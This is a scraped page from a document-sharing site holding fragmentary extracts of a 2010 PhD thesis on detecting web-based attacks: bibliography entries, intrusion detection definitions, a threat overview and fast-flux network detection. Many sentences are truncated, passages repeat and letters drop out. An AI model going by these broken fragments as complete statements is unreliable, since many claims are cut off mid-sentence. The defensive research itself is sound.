[Tandon et al. (2004)] Tandon, G., Chan, P., Mitra, D. (2004). Data Cleaning
and Enriched Representations for Anomaly Detection in System Calls. Machine
Learning and Data Mining for Computer Security, Springer London, 137-156.
105
[Tao et al. (2006)] Tao, D., Tang, X., Li, X., Wu, X., (2006). Asymmetric Bagging
and Random Subspace for Support Vector Machines-Based Relevance Feedback
in Image Retrieval. IEEE Transactions on Pattern Analysis and Machine Intel-
ligence, 28(7), 1088-1099. 108
[Torrano et al. (2009)] Torrano-Gimenez, C., Perez-Villegas, A., Gonzalo Alvarez,

G. (2009). A Self-learning Anomaly-Based Web Application Firewall, In Com-
putational Intelligence in Security for Information Systems, Springer Berlin Hei-
delberg. 62, 63, 64
[TippingPoint IPS] TippingPoint Technologies, Inc., Intrusion Prevention Systems

[Valeur (2006)] Valeur, F., Vigna, G., Kruegel, C., Kirda, E. (2006). An Anomaly-
driven Reverse Proxy for Web Applications, Proceedings of the ACM Symposium
on Applied Computing (SAC), Dijon, France, ACM. 85
[Valiant (1985)] Valiant, L.G., (1985). A teory of the learnable. ACM, 1985. 111
[Vigna et al. (2004)] Vigna, G., Robertson, W., Balzarotti, D. (2004). Testing
Network-based Intrusion Detection Signatures Using Mutant Exploits, ACM Con-
ference on Computer and Communications Security, 21-30. 117
[Vigna et al. (2005)] Vigna, G., Robertson, W., Balzarotti, D. (2005). Testing
network-based intrusion detection signatures using mutant exploits, In ACM Con-
ference on Computer and Communications Security, pp. 21-30. 60
[Wagner and Soto (2002)] Wagner, D., Soto, P., (2002). Mimicry Attacks on Host-
Based Intrusion Detection Systems. ACM, 255-264. 123
[Wang et al. (2004)] Wang, K., Stolfo, S.J. (2004). Anomalous payload-based net-
work intrusion detection. In Proceedings of Recent Advances in Intrusion Detec-
tion (RAID), pp. 203-222. Springer Verlag. 60
[WASC (2010)] Gordeychik, S. (2010). Web Application Security Statistics, The

Web Application Security Consortium ⇒ web link (accessed January 2010) 15,
16, 58
[Yong and Yangsheng (2006)] Yong, G., Yangsheng, W., (2006). Boosting in Ran-
dom Subspaces for Face Recognition. Proceedings of the 18th International Con-
ference on Pattern Recognition, 1, 519-522. 108
Bibliography 155
[Yurcik (2002)] Yurcik, W., (2002). Controlling Intrusion Detection Systems by

Generating False Positives: Squealing Proof-of-Concept. Proceedings of the 27th
Annual IEEE Conference on Local Computer Networks, IEEE, 134-135. 120
[Zhan et al. (2007)] Zhan, Q., Reeves, D.S., Ning, P., Purushothaman, S. (2007).
Analyzing Network Trac To Detect Self-Decrypting Exploit Code. Proceedings
of the 2nd ACM symposium on Information, computer and communications
security, ACM, 4-12. 119

Detection of Web-Based Attacks

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Detection of Web-Based Attacks

Загружено:

Авторское право:

Доступные форматы

PhD in Electronic and Computer Engineering

Department of Electrical and Electronic Engineering

Detection of Web-based Attacks

Dott. Ing. Igino Corona

Advisor: Prof. Ing. Giorgio Giacinto

Have a nice reading,

Cagliari, March 2010

2 Previous, Current and Future Internet Threats 9

3 Protecting web users 21

4 Protecting Web Services 57

4.3.2 Application-specic modules . . . . . . . . . . . . . . . . . . . 66

5 Intrusion Detection and Adversarial Environment 93

6 Concluding remarks 137

1.1 Computer Security

condentiality information access and disclosure are subject to authorized restric-

integrity information modication or destruction is subject to authorized restric-

availability information can be timely and reliably accessed and used.

1.2 Security assurance process

Prevention Prevention mechanisms aim at keeping security violations from hap-

Detection Detection mechanisms aim at identifying security violations, or attack

Counteraction Once a security violation (or an attack attempt) is detected, a

Weak authentication, inadequate conguration of systems, poor assumptions

In gure 1.2 we describe the security assurance process as a control sys-

Even a perfect detection mechanism is useless without a counteraction.

1.3 Intrusion Detection Systems

Architecture According to the Common Intrusion Detection Framework (CIDF)

• countermeasure box that performs suitable actions to protect the informa-

• storage box that stores events, alerts and countermeasures;

Input data (event box)

• Network-based Input data is made up of network events, collected from

• Host-based Input data is made up of host events, collected from one

Detection method (analysis box)

• Misuse-based (or signature-based) An alert is raised if current events

• Anomaly-based A model of the normal (legitimate) activity is dened.

Properties Intrusion Detection Systems may be characterized by many dierent

learning time amount of time necessary to automatically build/adapt detection

responsiveness how quickly the IDS respond to attacks by performing counterac-

computational and memory requirements resources required by the IDS dur-

The accuracy may be considered as the most important property of an IDS.

1.3.1 Intrusion Detection as a Pattern Recognition Task

2. Data preprocessing. Acquired data is processed so that patterns that do

3. Feature selection. This step aims at representing patterns in a feature space

4. Model selection. In this step, using a set of example patterns (training

Previous, Current and Future

In the 1988, Robert T. Morris, a graduate student in Computer Science at Cor-

In the mean time, the widespread adoption of Common Gateway Interfaces

2.1 Common Vulnerabilities

On the other hand, users may be attacked by well-known trusted websites

As evidenced by the Mitre corporation [CVE], the percentage of web-related

2.2 Know your enemy

Wealthy underground markets are currently managed by criminal organizations.

Criminal organizations virtually own million of compromised computers (i.e.

In recent years multiple evidences of nation-states involvement in cyber attacks

2.3 Web security is a major concern

According to the denition of the web-based architecture, we may subdivide the

2.3.1 Client-side web security

Moreover, client-side web security is widely aected by the so-called browsers'

Figure 2.3: Top vulnerabilities exploited on client-side software.

2.3.2 Server-side web security

The Web Application Security Consortium recently published a relevant report

These results, in addition to the public availability (i.e. exposition) of web

2.4 Adversarial Environment

Figure 2.4: Top web application vulnerabilities (source [WASC (2010)]).

4.3.2 Application-specic modules . . . . . . . . . . . . . . . . . . . 66

condentiality information access and disclosure are subject to authorized restric-

integrity information modication or destruction is subject to authorized restric-

Weak authentication, inadequate conguration of systems, poor assumptions

In gure 1.2 we describe the security assurance process as a control sys-

Even a perfect detection mechanism is useless without a counteraction.

• Anomaly-based A model of the normal (legitimate) activity is dened.

Properties Intrusion Detection Systems may be characterized by many dierent

On the other hand, users may be attacked by well-known trusted websites

Criminal organizations virtually own million of compromised computers (i.e.

According to the denition of the web-based architecture, we may subdivide the

Moreover, client-side web security is widely aected by the so-called browsers'

Throughout history, technological innovations have changed

3.1.2 Malicious fast ux service networks

Dierently from legitimate CDNs, whose nodes are professionally administered

Besides oering high availability of malicious content, malicious ux networks

Finally, the active probing of fast-ux domains used in previous

As a consequence, a cluster of domains may represent a malicious ux service,

3.2.1 Trac Volume Reduction (F1)

prexes extracted from P

3.2.5 Service Classier

of IP addresses among dierent networks, and represents a reasonable approximation of

φ7 Autonomous System (AS) diversity, φ8 BGP prex diversity, φ9 Organization di-

3.3.1 Collecting Recursive DNS Trac

Once ltering is completed, we apply a single-linkage hierarchical clustering algo-

3.3.3 Evaluation of the Service Classier

Table 3.2: Classication performance computed using 5-fold cross-validation.

Thus, we experimented on February, 2, 2010, with ux domain names detected in

An attacker may obtain these (condential) informations by just retrieving the